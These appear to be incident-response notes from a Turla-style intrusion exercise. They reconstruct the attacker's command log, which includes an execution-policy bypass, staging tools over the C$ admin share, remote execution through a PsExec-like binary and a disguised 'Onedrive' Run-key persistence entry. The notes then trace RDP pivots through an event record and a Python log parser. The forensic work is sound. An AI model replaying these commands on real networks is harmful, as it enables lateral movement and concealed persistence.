```powershell
Set-ADComputer -Identity "hobgoblin" -Description "Gunter Workstation"
Set-ADComputer -Identity "khabibulin" -Description "Adalwolfa Workstation"
Set-ExecutionPolicy -Scope CurrentUser bypass
ping 10.20.10.20
# restart the ViperVPNSvc service on 10.20.20.102
sc.exe \\10.20.20.102 stop ViperVPNSvc; sc.exe \\10.20.20.102 start ViperVPNSvc
# stage wsqmanager.exe on 10.20.20.104 over the C$ admin share, then launch it there with wsqsp.exe
xcopy.exe C:\windows\system32\wsqmanager.exe \\10.20.20.104\C$\Windows\system32\ /Y
wsqsp.exe \\10.20.20.104 -s C:\windows\system32\wsqmanager.exe
# Run-key persistence entry ("Onedrive" -> wingtsvcupdt.exe -r) written on 10.20.20.104
wsqsp.exe \\10.20.20.104 "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Onedrive\" /t REG_SZ /d" \"C:\\\\Windows\\\\system32\\\\wingtsvcupdt.exe -r\"" /f"
# copy SecEdit.ps1 to 10.20.20.104 and run it remotely through wsqsp.exe (done twice)
xcopy.exe C:\windows\system32\SecEdit.ps1 \\10.20.20.104\C$\Windows\system32\ /Y
wsqsp.exe \\10.20.20.104 powershell C:\\Windows\\System32\\SecEdit.ps1
xcopy.exe C:\windows\system32\SecEdit.ps1 \\10.20.20.104\C$\Windows\system32\ /Y
wsqsp.exe \\10.20.20.104 powershell C:\\Windows\\System32\\SecEdit.ps1
```
Can be confirmed in the registry, but it does not seem to be what was used for the RDP connection
It was run through wsqsp.exe, so it did not show up in the PowerShell logs
wsqmanager.exe can be looked up at https://attackevals.mitre-engenuity.org/results/enterprise/?vendor=rapid7&scenario=1&evaluation=turla
Searched for RDP
Target 10.20.20.102 ⇒ BANNIK.skt.local // judging from the context, this is the current PC
S-1-5-21-3447876202-3150415290-2715085020-1000
```xml
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-TerminalServices-ClientActiveXCore" Guid="28aa95bb-d444-4719-a36f-40462168127e" />
    <EventID>1024</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>101</Task>
    <Opcode>10</Opcode>
    <Keywords>0x4000000000000000</Keywords>
    <TimeCreated SystemTime="2024-10-02T21:01:27.5121243Z" />
    <EventRecordID>1</EventRecordID>
    <Correlation ActivityID="1f99c4a6-24ab-4be1-8be8-b0fab1590000" />
    <Execution ProcessID="3896" ThreadID="1968" />
    <Channel>Microsoft-Windows-TerminalServices-RDPClient/Operational</Channel>
    <Computer>BANNIK.skt.local</Computer>
    <Security UserID="S-1-5-21-3447876202-3150415290-2715085020-1000" />
  </System>
  <EventData>
    <Data Name="Name">Server Name</Data>
    <Data Name="Value">10.20.20.102</Data>
    <Data Name="CustomLevel">Info</Data>
  </EventData>
</Event>
```
Target 10.20.10.9 ⇒ HOBGOBLIN.skt.local // judging from the context, this is the next PC
S-1-5-21-3267669777-2918179565-1798510834-1000
S-1-5-21-2484783752-389083480-4161398059-1000
The connection time should be visible under [Connected Devices > Remote Desktop Protocol]
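The RDP client Operational event quoted above (EventID 1024 carrying "Server Name") is what these notes use to tie a target IP to the host and user SID that connected to it. As an added example that is not part of these notes, the Python below parses an exported batch of such events into a per-SID list of RDP targets; the sample events are constructed in the layout of the quoted one, the 1102 event is there only as filter noise, and the `<Events>` wrapper is an assumption because wevtutil XML exports have no root element.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
RDP_CLIENT_CHANNEL = "Microsoft-Windows-TerminalServices-RDPClient/Operational"

# Constructed sample in the layout of the event quoted in the notes: the BANNIK 1024
# event, a non-1024 noise event, and a second 1024 event for 10.20.10.9 under the
# other SID; the <Events> wrapper is assumed (wevtutil exports have no root element).
_TMPL = (
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>'
    '<EventID>{eid}</EventID><TimeCreated SystemTime="{ts}" /><Channel>'
    + RDP_CLIENT_CHANNEL + '</Channel><Computer>BANNIK.skt.local</Computer>'
    '<Security UserID="{sid}" /></System><EventData>{data}</EventData></Event>'
)
_SERVER = '<Data Name="Name">Server Name</Data><Data Name="Value">{v}</Data>'
SID_A = "S-1-5-21-3447876202-3150415290-2715085020-1000"
SID_B = "S-1-5-21-3267669777-2918179565-1798510834-1000"
SAMPLE_XML = "<Events>" + "".join([
    _TMPL.format(eid=1024, ts="2024-10-02T21:01:27.5121243Z", sid=SID_A, data=_SERVER.format(v="10.20.20.102")),
    _TMPL.format(eid=1102, ts="2024-10-02T21:01:28.0000000Z", sid=SID_A, data='<Data Name="Value">10.20.20.102</Data>'),
    _TMPL.format(eid=1024, ts="2024-10-02T21:05:02.1000000Z", sid=SID_B, data=_SERVER.format(v="10.20.10.9")),
]) + "</Events>"


def parse_rdp_client_events(xml_text):
    """Return outbound RDP attempts (EventID 1024 carrying 'Server Name') sorted by time."""
    records = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        system = ev.find("e:System", NS)
        if (system.findtext("e:Channel", namespaces=NS) != RDP_CLIENT_CHANNEL
                or system.findtext("e:EventID", namespaces=NS) != "1024"):
            continue  # other IDs in this channel do not carry the target name
        data = {d.get("Name"): d.text for d in ev.findall("e:EventData/e:Data", NS)}
        if data.get("Name") != "Server Name":
            continue
        records.append({"time": system.find("e:TimeCreated", NS).get("SystemTime"),
                        "source_host": system.findtext("e:Computer", namespaces=NS),
                        "user_sid": system.find("e:Security", NS).get("UserID"),
                        "target": data["Value"]})
    # Fixed-layout ISO-8601 UTC timestamps sort chronologically as plain strings.
    return sorted(records, key=lambda r: r["time"])


def targets_by_user(records):
    """Map each user SID to the ordered list of RDP targets it connected to."""
    by_sid = defaultdict(list)
    for r in records:
        by_sid[r["user_sid"]].append(r["target"])
    return dict(by_sid)
```

On a real export, replace `SAMPLE_XML` with the file contents wrapped in `<Events>...</Events>`; the source host, SID and time of each record then give the pivot points the notes are reconstructing by hand.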